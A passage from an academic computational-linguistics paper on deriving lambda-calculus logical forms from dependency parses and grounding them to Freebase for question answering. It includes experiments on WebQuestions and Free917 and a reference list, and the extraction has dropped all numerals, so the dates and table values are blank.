covered by the rule in ( )— prepositional phrases, conjunction, relative clauses, and wh questions—are handled in the formalism. prepositional phrases. prepositional phrase mod- ifiers to nouns and verbs have similar s-expressions: (prep president (pobj in )) (prep acquired (pobj in )) the following entries are used in these examples: in ⇒ λx. in(xe) prep ⇒ λfgz.∃x.f(z) ∧g(x) ∧ prep(ze,xa) pobj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ pobj(ze,xa) president ⇒ λx. president(xa) ∧president event(xe) ∧ arg (xe,xa) acquired ⇒ λx. acquired(xe) where the entries for prep and pobj simply mirror the original dependency structure with prep modifying the event variable ze. the semantics for acquired in is as follows: λx.∃py. acquired(xe) ∧ (ya) ∧ in(pe) ∧ prep(xe,pe) ∧ pobj(pe,ya) the system contains binarization rules (e.g., rules for obliqueness hierarchy and identifying traces) and substi- tution rules (i.e., rules for dependency labels and parts of speech). the rules can be found at http://github.com/ sivareddyg/deplambda. we replace in(pe) ∧ prep(xe,pe) ∧ pobj(pe,ya) by prep.in(xe,ya) as a post-processing step, effectively collapsing out the p variable while replacing the prep and pobj dependencies by a single dependency, prep.in. the final semantics are then as follows: λx.∃y. acquired(xe) ∧ (ya) ∧ prep.in(xe,ya) in practice this step is easily achieved by identifying variables (in this case pe) participating in prep and pobj relations. it would be tempting to achieve this step within the lambda calculus expressions them- selves, but we have found the post-processing step to be more robust to parsing errors and corner cases in the usage of the prep and pobj dependency labels. conjunctions. first consider a simple case of np- conjunction, bill and dave founded hp, whose s-expression is as follows: (nsubj (dobj founded hp) (conj-np (cc bill and) dave)) we make use of the following entries: conj-np ⇒ λfgx.∃yz.f(y) ∧g(z) ∧ coord(x,y,z) cc ⇒ λfgz.f(z) the sentence bill and dave founded hp then re- ceives the following semantics: λe.∃xyzu. bill(ya) ∧ dave(za) ∧ founded(ee) ∧ hp(ua) ∧coord(x,y,z) ∧ arg (ee,xa) ∧ arg (ee,ua) note how the x variable occurs in two sub- expressions: coord(x,y,z), and arg (ee,xa). it can be interpreted as a variable that conjoins variables y and z together. in particular, we introduce a post-processing step where the sub- expression coord(x,y,z) ∧ arg (ee,xa) is replaced with arg (ee,ya) ∧ arg (ee,za), and the x variable is removed. the resulting expression is as follows: λe.∃yzu. bill(ya) ∧ dave(za) ∧ founded(ee) ∧ hp(ua) ∧arg (ee,ya) ∧ arg (ee,za) ∧ arg (ee,ua) vp-coordination is treated in a very similar way. consider the sentence eminem signed to interscope and discovered cent. this has the following s-expression: (nsubj (conj-vp (cc s-to-i and) d- ) eminem) where s-to-i refers to the vp signed to interscope, and d- refers to the vp discovered cent. the lambda-calculus expression for conj-vp is identical to the expression for conj-np: http://github.com/sivareddyg/deplambda http://github.com/sivareddyg/deplambda conj-vp ⇒ λfgx.∃yz.f(y) ∧g(z) ∧ coord(x,y,z) the logical form for the full sentence is then λe.∃xyz. eminem(xa) ∧ coord(e,y,z) ∧arg (ee,xa) ∧ s to i(y) ∧ d (z) where we use s to i(y) and d (z) as shorthand for the lambda-calculus expressions for the two vps. after post-processing this is simplified to λe.∃xyz. eminem(xa) ∧ arg (ye,xa) ∧arg (ze,xa) ∧ s to i(y) ∧ d (z) other types of coordination, such as sentence- level coordination and pp coordination, are handled with the same mechanism. all coordination depen- dency labels have the same semantics as conj-np and conj-vp. the only reason for having distinct de- pendency labels for different types of coordination is that different labels appear in different positions in the obliqueness hierarchy. this is important for getting the correct scope for different forms of con- junction. for instance, the following s-expression for the eminem example would lead to an incorrect semantics: (conj-vp (nsubj (cc s-to-i and) eminem) d- ) this s-expression is not possible under the oblique- ness hierarchy, which places nsubj modifiers to a verb after conj-vp modifiers. we realize that this treatment of conjunction is quite naive in comparison to that on offer in ccg. however, given the crude analysis of conjunction in dependency syntax, a more refined treatment is beyond the scope of the current approach. relative clauses. our treatment of relative clauses is closely related to the mechanism for traces de- scribed by moortgat ( ; ); see also carpenter ( ) and pereira ( ). consider the np apple which jobs founded with s-expression: (rcmod apple (wh-dobj (bind f (nsubj (dobj founded f) jobs)) which)) note that the s-expression has been augmented to include a variable f in dobj position, with (bind f ...) binding this variable at the clause level. these annotations are added using a set of heuristic rules over the original dependency parse tree. the bind operation is interpreted in the following way. if we have an expression of the form (bind f λx.g(x)) where f is a variable and g is an expression that includes f, this is converted to λz.∃x.g(x) |f=eq(z) where g(x) |f=eq(z) is the expression g(x) with the expression eq(z) substituted for f. eq(z)(z′) is true iff z and z′ are equal (refer to the same entity). in addition we assume the following entries: wh-dobj ⇒ λfgz.f(z) rcmod ⇒ λfgz.f(z) ∧g(z) it can be verified that (bind f (nsubj (dobj founded f) jobs)) has semantics λu.∃xyz. founded(xe) ∧ jobs(ya) ∧ eq(u)(z) ∧arg (xe,ya) ∧ arg (xe,za) and apple which jobs founded has semantics λu.∃xyz. founded(xe) ∧ jobs(ya) ∧ eq(u)(z) ∧arg (xe,ya) ∧ arg (xe,za) ∧ apple(ua) as intended. note that this latter expression can be simplified, by elimination of the z variable, to λu.∃xy. founded(xe) ∧ jobs(ya) ∧arg (xe,ya) ∧ arg (xe,ua) ∧ apple(ua) wh questions. wh questions are handled using the bind-mechanism described in the previous sec- tion. as one example, the s-expression for who did jim marry is as follows: (wh-dobj (bind f (nsubj (aux (dobj marry f) did) jim)) who) we assume the following lambda expressions: who ⇒ λx. target(xa) did ⇒ λx. true aux ⇒ λfg.f wh-dobj ⇒ λfgx.f(x) ∧g(x) it can be verified that this gives the final logical form λx.∃yz. target(xa) ∧ marry(ye) ∧ jim(za) ∧arg (ye,za) ∧ arg (ye,xa) note that the predicate target is applied to the variable that is the focus of the question. a similar treatment is used for cases with the wh-element in subject position (e.g., who married jim ) or where the wh-element is extracted from a prepositional phrase (e.g., who was jim married to ). . comparison to ccg in this section we discuss some differences between our approach and ccg-based approaches for map- ping sentences to logical forms. although our focus is on ccg, the arguments are similar for other for- malisms that use the lambda calculus in conjunction with a generative grammar, such as hpsg and lfg, or approaches based on context-free grammars. our approach differs in two important (and re- lated) respects from ccg: ( ) all constituents in our approach have the same semantic type (ind × event → bool); ( ) our formalism does not make the argument/adjunct distinction, instead essentially treating all modifiers to a given head as adjuncts. as an example, consider the analysis of disney acquired pixar within ccg. in this case acquired would be assigned the following ccg lexical entry: s\np/np ⇒ λf f x.∃yz. acquired(x) ∧f (y) ∧f (z) ∧arg (x,y) ∧ arg (x,z) note the explicit arguments corresponding to the subject and object of this transitive verb (f and f , respectively). an intransitive verb such as sleeps would be assigned an entry with a single functional argument corresponding to the subject (f ): s\np ⇒ λf x.∃y. sleeps(x) ∧f (y) ∧ arg (x,y) in contrast, the entries in our system for these two verbs are simply λx. acquired(xe) and λx. sleeps(xe). the two forms are similar, have the same semantic type, and do not include variables such as f and f for the subject and object. the advantage of our approach is that it is ro- bust, and relatively simple, in that a strict gram- mar that enforces type checking is not required. however, there are challenges in handling some lin- guistic constructions. a simple example is passive verbs. in our formalism, the passive form of ac- quired has the form λx. acquired.pass(xe), distinct from its active form λx. acquired(xe). the sen- tence pixar was acquired is then assigned the log- ical form λx.∃y. acquired.pass(xe) ∧ pixar(ya) ∧ arg (xe,ya). modifying our approach to give the same logical forms for active and passive forms would require a significant extension of our approach. in contrast, in ccg the lexical entry for the passive form of acquired can directly specify the mapping between subject position and the arg : s\np ⇒ λf x.∃z. acquired(x) ∧f (z) ∧ arg (x,z) as another example, correct handling of object and subject control verbs is challenging in the single- type system: for example, in the analysis for john persuaded jim to acquire apple, the ccg analysis would have an entry for persuaded that explicitly takes three arguments (in this case john, jim, and to acquire apple ) and assigns jim as both the direct object of persuaded and as the subject of acquire. in our approach the subject relationship to acquire is instead recovered in a post-processing step, based on the lexical identity of persuaded. semantic parsing as graph matching we next describe how the ungrounded logical forms from the previous section are mapped to a fully grounded semantic representation that can be used for question answering against freebase. follow- ing reddy et al. ( ), we treat this mapping as a graph matching problem, but instead of deriving un- grounded graphs from ccg-based logical forms, we use the dependency-based logical forms from the pre- vious sections. to learn the mapping to freebase, we rely on manually assembled question-answer pairs. for each training question, we first find the set of oracle grounded graphs—freebase subgraphs which when executed yield the correct answer—derivable from the question logical form. these oracle graphs are then used to train a structured perceptron model. . ungrounded graphs we follow reddy et al. ( ) and first convert logi- cal forms to their corresponding ungrounded graphs. figure (a) shows an example for what is the name of the company which disney acquired in ?. predi- cates corresponding to resolved entities (disney(ya) and (va)) become entity nodes (rectangles), whereas remaining entity predicates (name(wa) and company(xa)) become entity nodes (wa and xa), connected to entity type nodes (name and company; rounded rectangles). the target(wa) node (dia- mond) connects to the entity node whose denotation corresponds to the answer to the question. . grounded graphs the ungrounded graphs are grounded to freebase subgraphs by mapping entity nodes, entity-entity name target company wa we xa ze disney ze ze ac qu ire d. ar g ac qu ire d. ar g a c q u ire d .p re p .in a c q u ire d .a rg acquired.arg acquired.prep.in name.arg name.prep.of ty p e ty p e contract (a) before contract. target organization. organization company name xa ze disney ze ze ac qu ire d. ar g ac qu ire d. ar g bu sin es s. ac qu ist ion . ac qu iri ng co m pa ny bu sin ess .ac qu ist ion . co mp an y a cq uir ed a c q u ire d .p re p .in a c q u ire d .a rg b u sin e ss. a c q u isitio n . d a te b u sin e ss. a c q u istio n . c o m p a n y a c q u ire d acquired.arg acquired.prep.in business. acquistion. acquiring com pany business. acquisition. date type ty p e (b) after contract. figure : the contract operation applied to the un- grounded graph for the question what is the name of the company which disney acquired in ?. after con- tract has been applied the graph is isomorphic to the representation in freebase; in (b) we show the freebase predicates after grounding in blue. edges and entity type nodes in the ungrounded graph to freebase entities, relations and types, respec- tively. while reddy et al. ( ) assume that the un- grounded graphs are isomorphic to their correspond- ing freebase subgraph, at least % of the examples in our development set do not satisfy this property. for example, the ungrounded graph in figure (a) is not isomorphic to the freebase subgraph in fig- ure (b), making it impossible to derive the correct grounded graph from the ungrounded one by a direct mapping. to account for such structural mismatch, we introduce two simple transformation operations. contract. the contract operation takes a pair of entity nodes connected by an edge and merges them into a single node. for example, in figure (a) the entity nodes wa and xa are connected by an edge via the event we. after applying the contract op- eration to nodes wa and xa, they are merged. note how in figure (b) all the nodes attached to wa attach to the node xa after this operation. the contracted graph is now isomorphic to its freebase subgraph. expand. parse errors may lead to ungrounded graphs with disconnected components. for example, the ungrammatical question what to do washington dc december? results in the lambda expression λz.∃xyw. target(xa) ∧ do(ze) ∧ arg (ze,xa) ∧ washington dc(ya) ∧ december(wa). the corre- sponding ungrounded graph has three disconnected components (december and washington dc, and the component with entity node xa linked to event ze). in such cases, the graph is expanded by link- ing disconnected entity nodes to the event node with the largest edge degree. in the example above, this would add edges corresponding to the predicates dep(ze,ya) ∧ dep(ze,wa), where dep is the predi- cate introduced by the expand operation when link- ing ya and wa to ze. when there is no existing event node in the graph, a dummy event node is introduced. . learning we use a linear model to map ungrounded to grounded graphs. the parameters of the model are learned from question-answer pairs. for example, the question what is the name of the company which disney acquired in ? is paired with its answer {pixar}. in line with most work on question answer- ing against freebase, we do not rely on annotated log- ical forms associated with the question for training, instead treating grounded graphs as latent variables. let q be a question, let u be an ungrounded graph for q and let g be a grounded graph formed by ground- ing the nodes and edges of u to the knowledge base k (throughout we use freebase as the knowledge base). following reddy et al. ( ), we use beam search to find the highest scoring pair of ungrounded and grounded graphs (û, ĝ) under the model θ ∈ . for training. experimental setup we next verify empirically that our proposed ap- proach derives a useful logical compositional seman- tic representation from dependency syntax. below, we give details on the evaluation datasets and base- lines used for comparison. we also describe the model features and provide implementation details. . training and evaluation datasets we evaluated our approach on the free (cai and yates, ) and webquestions (berant et al., ) datasets. free consists of questions manually annotated with their freebase query. we retrieved the answer to each question by executing its query on freebase and ignore the query for all subsequent ex- periments. webquestions consists of question- answer pairs. the standard train/test splits were used for both datasets, with free containing train and test questions and webquestions contain- ing train and test questions. for all our development experiments we tuned the models on held-out data consisting of % of the training ques- tions, while for final testing we used the complete training data. . baseline models and representations in addition to the dependency-based semantic rep- resentation deplambda (section ) and previous work on these datasets, we compare to three addi- tional baseline representations outlined below. we use graphparser to map these representations to freebase. deptree. in this baseline, an ungrounded graph is created directly from the original dependency tree. an event is created for each parent and its dependents in the tree. each dependent is linked to this event with an edge labeled with its dependency relation, while the parent is linked to the event with an edge labeled arg . if a word is a question word, an additional target predicate is attached to its entity node. simplegraph. this representation has a single event to which all entities in the question are con- nected by the predicate arg . an additional target node is connected to the event by the predicate arg . this is similar to the template representation of yao ( ) and bast and haussmann ( ). note that this cannot represent any compositional structure. ccggraph. finally, we compare to the ccg- based semantic representation of reddy et al. ( ), adding the contract and expand operations to increase its expressivity. . implementation details below are more details of our entity resolution model, the syntactic parser used, features in the grounding model and the beam search procedure. entity resolution. for free , we follow prior work and resolve entities by string match against the entity lexicon provided with the dataset. for web- questions, we use eight handcrafted part-of-speech patterns to identify entity span candidates. we use the stanford corenlp caseless tagger for part-of-speech tagging (manning et al., ). for each candidate mention span, we retrieve the top entities accord- ing to the freebase api. we then create a lattice in which the nodes correspond to mention-entity pairs, scored by their freebase api scores, and the edges encode the fact that no joint assignment of entities to mentions can contain overlapping spans. finally, we generate ungrounded graphs for the top paths through the lattice and treat the final entity disam- biguation as part of the semantic parsing problem. http://github.com/sivareddyg/graph-parser http://developers.google.com/freebase/ http://github.com/sivareddyg/graph-parser http://developers.google.com/freebase/ representation -c -e -c +e +c -e +c +e (a) average oracle f deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (b) average number of oracle graphs per question deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (c) average f deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . table : oracle statistics and accuracies on the web- questions development set. +(-)c: with(out) contract. +(-)e: with(out) expand. syntactic parsing. we recase the resolved entity mentions and run a case-sensitive second-order con- ditional random field part-of-speech tagger (laf- ferty et al., ). the hypergraph parser of zhang and mcdonald ( ) is used for dependency pars- ing. the tagger and parser are both trained on the ontonotes . corpus (weischedel et al., ), with constituency trees converted to stanford-style depen- dencies (de marneffe and manning, ). to derive the ccg-based representation, we use the output of the easyccg parser (lewis and steedman, ). features. we use the features from reddy et al. ( ), which include edge alignment and stem over- lap between ungrounded and grounded graphs, and contextual features such as word and grounded rela- tion pairs. in addition, we introduce a feature indi- cating the use of the contract operation: (merged- subedge, headsubedge, mergedisentity, headisen- tity). for example, in figure the edge between wa and xa is contracted to xa, resulting in the feature (name.arg , name.prep.of, false, false). the ex- pand operation is treated as a pre-processing step and no features are used to encode its use. finally, the entity-lattice score is used as a real valued feature. beam search. we use beam search to infer the highest scoring graph pair for a question. the search operates over entity-entity edges and entity type nodes of each ungrounded graph. for an entity-entity representation -c -e -c +e +c -e +c +e (a) oracle accuracy deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (b) average number of oracle graphs per question deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (c) accuracy deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . table : oracle statistics and accuracies on the free development set. +(-)c: with(out) contract. +(-)e: with(out) expand. edge, we can ground the edge to a freebase relation, contract the edge in either direction, or skip the edge. for an entity type node, we can ground the node to a freebase type, or skip the node. the order of traversal is based on the number of named entities connected to an edge. after an edge is grounded, the entity type nodes connected to it are grounded in turn, before the next edge is processed. to restrict the search, if two beam items correspond to the same grounded graph, the one with the lower score is discarded. a beam size of was used in all experiments. experimental results we examine the different representations for ques- tion answering along two axes. first, we compare their expressiveness in terms of answer reachability assuming a perfect model. second, we compare their performance with a learned model. finally, we con- duct a detailed error analysis of deplambda, with a comparison to the errors made by ccggraph. for webquestions evaluation is in terms of the av- erage f -score across questions, while for free , evaluation is in terms of exact answer accuracy. . expressiveness of the representations table (a) and table (a) show the oracle f -scores of each representation on the webquestions and we use the evaluation scripts available at http:// www-nlp.stanford.edu/software/sempre and http:// github.com/elmar-haussmann/aqqu, respectively. http://www-nlp.stanford.edu/software/sempre http://www-nlp.stanford.edu/software/sempre http://github.com/elmar-haussmann/aqqu http://github.com/elmar-haussmann/aqqu free development sets respectively. according to the first column (-c -e), the original deptree repre- sentation can be directly mapped to freebase for less than a third of the questions. adding the contract operation (+c) improves this substantially to an ora- cle f of about % on webquestions and . % on free . however, this comes at the cost of massive spurious ambiguity: from table (b) there are on av- erage over oracle graphs for a single dependency tree. table (c) shows the results of the different representations on the webquestions development set. spurious ambiguity clearly hampers learning and deptree falls behind the other representations. ccggraph and deplambda align much more closely to freebase and achieve similar oracle f scores with far less spurious ambiguity. simple- graph, which cannot represent any compositional semantics, is competitive with these syntax-based representations. this might come as a surprise, but it simply reflects the fact that the dataset does not con- tain questions that require compositional reasoning. . results on webquestions and free we use the best settings on the development set in subsequent experiments, i.e., with contract and expand enabled. table shows the results on the webquestions and free test sets with additional entries for recent prior work on these datasets. the trend from the development set carries over and de- plambda outperforms the other graph-based repre- sentations, while performing slightly below the state- of-the-art model of yih et al. ( ) (“y&c”), which uses a separately trained entity resolution system (yang and chang, ). when using the standard freebase api (“fb api”) for entity resolution, the performance of their model drops to . % f . on free , deplambda outperforms all other representations by a wide margin and obtains the best result to date. interestingly, deptree outperforms simplegraph in this case. we attribute this to the small training set and larger lexical variation of free . the structural features of the graph-based representations seem highly beneficial in this case. . error analysis we categorized errors made by deplambda (+c +e) on the webquestions development set. in cases the correct answer is present in the beam, free webquestions method accuracy average f cai and yates ( ) . – berant et al. ( ) . . kwiatkowski et al. ( ) . – yao and van durme ( ) – . berant and liang ( ) . . bao et al. ( ) – . bordes et al. ( ) – . yao ( ) – . yih et al. ( ) (fb api) – . bast and haussmann ( ) . . berant and liang ( ) – . yih et al. ( ) (y&c) – . this work deptree . . simplegraph . . ccggraph (+c +e) . . deplambda (+c +e) . . table : question-answering results on the webquestions and free test sets. but ranked below an incorrect answer (e.g., for where does volga river start, the annotated gold answer is valdai hills, which is ranked second, with russia, europe ranked first). in cases, only a subset of the answer is predicted correctly (e.g, for what coun- tries in the world speak german, the system predicts germany from the human language.main country freebase relation, whereas the gold relation human language.countries spoken in gives multi- ple countries). together, these two categories corre- spond to roughly % of the errors. in cases, the freebase api fails to add the gold entity to the lattice (e.g., for who is blackwell, the correct blackwell en- tity was missing). due to the way webquestions was crowdsourced, questions have incorrect or incom- plete gold annotations (e.g., what does each fold of us flag means is answered with usa). the remaining cases are due to structural mismatch (e.g., in who is the new governor of florida , the graph failed to connect the target node with both and florida ). due to the ungrammatical nature of webquestions, ccggraph fails to produce ungrounded graphs for . % of the complete development set, while de- plambda is more robust with only . % such errors. the ccg parser is restricted to produce a sentence tag as the final category in the syntactic derivation, which penalizes ungrammatical analyses (e.g., what victoria beckham kids names and what nestle owns ). examples where deplambda fails due to parse er- rors, but ccggraph succeed include when was blessed kateri born and where did anne frank live before the war. note that the expand operation mit- igates some of these problems. while ccg is known for handling comparatives elegantly (e.g., who was sworn into office when john f kennedy was assassi- nated ), we do not have a special treatment for them in the semantic representation. differences in syn- tactic parsing performance and the somewhat limited expressivity of the semantic representation are likely the reasons for ccggraph’s lower performance. related work there are two relevant strands of prior work: gen- eral purpose ungrounded semantics and grounded semantic parsing. the former have been studied on their own and as a component in tasks such as seman- tic parsing to knowledge bases (kwiatkowski et al., ; reddy et al., ; choi et al., ; krishna- murthy and mitchell, ), sentence simplification (narayan and gardent, ), summarization (liu et al., ), paraphrasing (pavlick et al., ) and relation extraction (rocktäschel et al., ). there are two ways of generating these representations: ei- ther relying on syntactic structure and producing the semantics post hoc, or generating it directly from text. we adopt the former approach, which was pioneered by montague ( ) and is becoming increasingly at- tractive with the advent of accurate syntactic parsers. there have been extensive studies on extracting semantics from syntactic representations such as lfg (dalrymple et al., ), hpsg (copestake et al., ; copestake et al., ), tag (gar- dent and kallmeyer, ; joshi et al., ) and ccg (baldridge and kruijff, ; bos et al., ; steedman, ; artzi et al., ). however, few have used dependency structures for this purpose. debusmann et al. ( ) and cimiano ( ) de- scribe grammar-based conversions of dependencies to semantic representations, but do not validate them empirically. stanovsky et al. ( ) use heuristics based on linguistic grounds to convert dependen- cies to proposition structures. bédaride and gar- dent ( ) propose a graph-rewriting technique to convert a graph built from dependency trees and se- mantic role structures to a first-order logical form, and present results on textual entailment. our work, in contrast, assumes access only to dependency trees and offers an alternative method based on the lambda calculus, mimicking the structure of knowledge bases such as freebase; we further present extensive empir- ical results on recent question-answering corpora. structural mismatch between the source semantic representation and the target application’s represen- tation is an inherent problem with approaches using general-purpose representations. kwiatkowski et al. ( ) propose lambda-calculus operations to gen- erate multiple type-equivalent expressions to handle this mismatch. in contrast, we use graph-transduction operations which are relatively easier to interpret. there is also growing work on converting syntactic structures to the target application’s structure without going through an intermediate semantic representa- tion, e.g., answer-sentence selection (punyakanok et al., ; heilman and smith, ; yao et al., ) and semantic parsing (ge and mooney, ; poon, ; parikh et al., ; xu et al., ; wang et al., ; andreas and klein, ). a different paradigm is to directly parse the text into a grounded semantic representation. typically, an over-generating grammar is used whose accepted parses are ranked (zelle and mooney, ; zettle- moyer and collins, ; wong and mooney, ; kwiatkowksi et al., ; liang et al., ; berant et al., ; flanigan et al., ; groschwitz et al., ). in contrast, bordes et al. ( ) and dong et al. ( ) discard the notion of a target represen- tation altogether and instead learn to rank potential answers to a given question by embedding questions and answers into the same vector space. conclusion we have introduced a method for converting depen- dency structures to logical forms using the lambda calculus. a key idea of this work is the use of a single semantic type for every constituent of the dependency tree, which provides us with a robust way of com- positionally deriving logical forms. the resulting representation is subsequently grounded to freebase by learning from question-answer pairs. empirically, the proposed representation was shown to be superior to the original dependency trees and more robust than logical forms derived from a ccg parser. acknowledgements this work greatly benefitted from discussions with slav petrov, john blitzer, fernando pereira, emily pitler and nathan schneider. the authors would also like to thank christopher potts and the three anony- mous reviewers for their valuable feedback. we ac- knowledge the financial support of eu ist cognitive systems ip ec-fp - “xperience” (steedman) and epsrc (ep/k / ) in the framework of the chist-era readers project (lapata). references jacob andreas and dan klein. . alignment-based compositional semantics for instruction following. in proceedings of empirical methods on natural lan- guage processing, pages – . yoav artzi, kenton lee, and luke zettlemoyer. . broad-coverage ccg semantic parsing with amr. in proceedings of empirical methods on natural lan- guage processing, pages – . jason baldridge and geert-jan kruijff. . coupling ccg and hybrid logic dependency semantics. in pro- ceedings of association for computational linguistics, pages – . junwei bao, nan duan, ming zhou, and tiejun zhao. . knowledge-based question answering as ma- chine translation. in proceedings of association for computational linguistics, pages – . hannah bast and elmar haussmann. . more accu- rate question answering on freebase. in proceedings of acm international conference on information and knowledge management, pages – . paul bédaride and claire gardent. . deep semantics for dependency structures. in proceedings of confer- ence on intelligent text processing and computational linguistics, pages – . jonathan berant and percy liang. . semantic parsing via paraphrasing. in proceedings of association for computational linguistics, pages – . jonathan berant and percy liang. . imitation learning of agenda-based semantic parsers. transac- tions of the association for computational linguistics, : – . jonathan berant, andrew chou, roy frostig, and percy liang. . semantic parsing on freebase from question-answer pairs. in proceedings of empirical methods on natural language processing, pages – . antoine bordes, sumit chopra, and jason weston. . question answering with subgraph embeddings. in proceedings of empirical methods on natural lan- guage processing, pages – . johan bos, stephen clark, mark steedman, james r. cur- ran, and julia hockenmaier. . wide-coverage semantic representations from a ccg parser. in pro- ceedings of international conference on computational linguistics, pages – . qingqing cai and alexander yates. . large-scale semantic parsing via schema matching and lexicon extension. in proceedings of association for computa- tional linguistics, pages – . bob carpenter. . type-logical semantics. mit press, cambridge, ma, usa. david l. chen and raymond j. mooney. . learning to interpret natural language navigation instructions from observations. in proceedings of association for the advancement of artificial intelligence, pages – . eunsol choi, tom kwiatkowski, and luke zettlemoyer. . scalable semantic parsing with partial ontolo- gies. in proceedings of association for computational linguistics, pages – . philipp cimiano. . flexible semantic composition with dudes. in proceedings of international confer- ence on computational semantics, pages – . michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proceedings of empiri- cal methods on natural language processing, pages – . ann copestake, alex lascarides, and dan flickinger. . an algebra for semantic construction in constraint-based grammars. in proceedings of associ- ation for computational linguistics, pages – . ann copestake, dan flickinger, carl pollard, and ivan a. sag. . minimal recursion semantics: an in- troduction. research on language and computation, ( - ): – . mary dalrymple, john lamping, fernando c. n. pereira, and vijay a. saraswat. . linear logic for mean- ing assembly. in proceedings of computational logic for natural language processing. marie-catherine de marneffe and christopher d manning. . stanford typed dependencies manual. technical report, stanford university. ralph debusmann, denys duchier, alexander koller, marco kuhlmann, gert smolka, and stefan thater. . a relational syntax-semantics interface based on dependency grammar. in proceedings of interna- tional conference on computational linguistics, pages – . li dong, furu wei, ming zhou, and ke xu. . ques- tion answering over freebase with multi-column con- volutional neural networks. in proceedings of associ- ation for computational linguistics, pages – . jeffrey flanigan, sam thomson, jaime carbonell, chris dyer, and noah a. smith. . a discriminative graph-based parser for the abstract meaning repre- sentation. in proceedings of association for computa- tional linguistics, pages – . yoav freund and robert e. schapire. . large margin classification using the perceptron algorithm. ma- chine learning, ( ): – , december. claire gardent and laura kallmeyer. . semantic construction in feature-based tag. in proceedings of european chapter of the association for computa- tional linguistics, pages – . ruifang ge and raymond mooney. . learning a compositional semantic parser using an existing syntactic parser. in proceedings of association for computational linguistics, pages – . jonas groschwitz, alexander koller, and christoph teich- mann. . graph parsing with s-graph grammars. in proceedings of association for computational linguis- tics, pages – . michael heilman and noah a. smith. . tree edit models for recognizing textual entailments, para- phrases, and answers to questions. in proceedings of north american chapter of the association for com- putational linguistics, pages – . aravind k. joshi, laura kallmeyer, and maribel romero. . flexible composition in ltag: quantifier scope and inverse linking. in harry bunt and reinhard muskens, editors, computing meaning, volume of studies in linguistics and philosophy, pages – . springer netherlands. jayant krishnamurthy and tom mitchell. . weakly supervised training of semantic parsers. in proceed- ings of empirical methods on natural language pro- cessing, pages – . jayant krishnamurthy and tom m. mitchell. . learn- ing a compositional semantics for freebase with an open predicate vocabulary. transactions of the associ- ation for computational linguistics, : – . tom kwiatkowksi, luke zettlemoyer, sharon goldwater, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of empirical methods on natural language processing, pages – . tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceedings of empirical methods on natural language processing, pages – . john lafferty, andrew mccallum, and fernando pereira. . conditional random fields: probabilistic mod- els for segmenting and labeling sequence data. in proceedings of international conference on machine learning, pages – . mike lewis and mark steedman. . a* ccg parsing with a supertag-factored model. in proceedings of empirical methods on natural language processing, pages – . percy liang, michael jordan, and dan klein. . learning dependency-based compositional seman- tics. in proceedings of association for computational linguistics, pages – . fei liu, jeffrey flanigan, sam thomson, norman sadeh, and noah a. smith. . toward abstractive sum- marization using semantic representations. in pro- ceedings of north american chapter of the association for computational linguistics, pages – . christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of association for com- putational linguistics, pages – . andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of associa- tion for computational linguistics, pages – . cynthia matuszek, nicholas fitzgerald, luke zettle- moyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded at- tribute learning. in proceedings of international con- ference on machine learning. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajič. . non-projective dependency parsing using spanning tree algorithms. in proceedings of empirical methods on natural language processing, pages – . richard montague. . the proper treatment of quan- tification in ordinary english. in k.j.j. hintikka, j.m.e. moravcsik, and p. suppes, editors, approaches to nat- ural language, volume of synthese library, pages – . springer netherlands. michael moortgat. . categorical investigations. log- ical and linguistic aspects of the lambek calculus. foris, dordrecht. michael moortgat. . generalized quantification and discontinuous type constructors. technical report, university of utrecht. shashi narayan and claire gardent. . hybrid sim- plification using deep semantics and machine transla- tion. in proceedings of association for computational linguistics, pages – . joakim nivre, johan hall, jens nilsson, atanas chanev, gülsen eryigit, sandra kübler, svetoslav marinov, and erwin marsi. . maltparser: a language- independent system for data-driven dependency pars- ing. natural language engineering, ( ): – . ankur p. parikh, hoifung poon, and kristina toutanova. . grounded semantic parsing for complex knowl- edge extraction. in proceedings of north american chapter of the association for computational linguis- tics, pages – . ellie pavlick, johan bos, malvina nissim, charley beller, benjamin van durme, and chris callison-burch. . adding semantics to data-driven paraphrasing. in pro- ceedings of association for computational linguistics, pages – . fernando c. n. pereira. . categorial semantics and scoping. computational linguistics, ( ): – . carl pollard and ivan a. sag. . head-driven phrase structure grammar. university of chicago press. hoifung poon. . grounded unsupervised semantic parsing. in proceedings of association for computa- tional linguistics, pages – . vasin punyakanok, dan roth, and wen-tau yih. . mapping dependencies trees: an application to ques- tion answering. in proceedings of international sym- posium on artificial intelligence and mathematics, pages – . siva reddy, mirella lapata, and mark steedman. . large-scale semantic parsing without question- answer pairs. transactions of the association for com- putational linguistics, : – . tim rocktäschel, sameer singh, and sebastian riedel. . injecting logical background knowledge into embeddings for relation extraction. in proceedings of north american chapter of the association for compu- tational linguistics, pages – . gabriel stanovsky, jessica ficler, ido dagan, and yoav goldberg. . getting more out of syntax with props. arxiv e-prints, march. mark steedman. . taking scope - the natural se- mantics of quantifiers. mit press. chuan wang, nianwen xue, and sameer pradhan. . a transition-based algorithm for amr parsing. in proceedings of north american chapter of the associ- ation for computational linguistics, pages – . ralph weischedel, eduard hovy, martha palmer, mitch marcus, robert belvin, sameer pradhan, lance ramshaw, and nianwen xue. . ontonotes: a large training corpus for enhanced processing. in j. olive, c. christianson, and j. mccary, editors, hand- book of natural language processing and machine translation. springer. yuk wah wong and raymond j. mooney. . learning for semantic parsing with statistical machine trans- lation. in proceedings of north american chapter of the association for computational linguistics, pages – . yuk wah wong and raymond mooney. . learn- ing synchronous grammars for semantic parsing with lambda calculus. in proceedings of association for computational linguistics, pages – . kun xu, yansong feng, songfang huang, and dongyan zhao. . question answering via phrasal semantic parsing. in proceedings of conference and labs of the evaluation forum, pages – . yi yang and ming-wei 